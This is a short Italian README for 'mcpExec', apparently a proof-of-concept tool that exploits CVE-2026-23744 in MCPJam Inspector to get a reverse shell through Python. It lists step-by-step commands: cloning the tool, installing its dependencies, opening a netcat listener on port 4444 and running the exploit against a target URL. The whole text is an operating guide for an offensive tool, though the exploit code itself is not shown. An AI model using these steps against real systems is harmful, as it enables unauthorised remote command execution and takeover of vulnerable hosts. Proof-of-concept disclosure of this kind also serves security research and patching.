
POC per CVE-2026-23744 per una reverse shell Python.
mcpExec è uno strumento che sfrutta la CVE-2026-23744 per ottenere una reverse shell utilizzando l'URL dell'installazione vulnerabile di MCPJam Inspector.
git clone https://github.com/daemoncibsec/mcpExec.git
cd mcpExec
python3 -m venv venv
source venv/bin/activate
pip install rich
pip install argparse
pip install requests
chmod +x mcpExec.py
Per uscire dal venv:
deactivate
Apri un listener affinché l'exploit funzioni:
nc -nvlp 4444
Questo comando ti fornirà la reverse shell (se il sistema interessato ha Python3 installato).
./mcpExec.py http://localhost:6274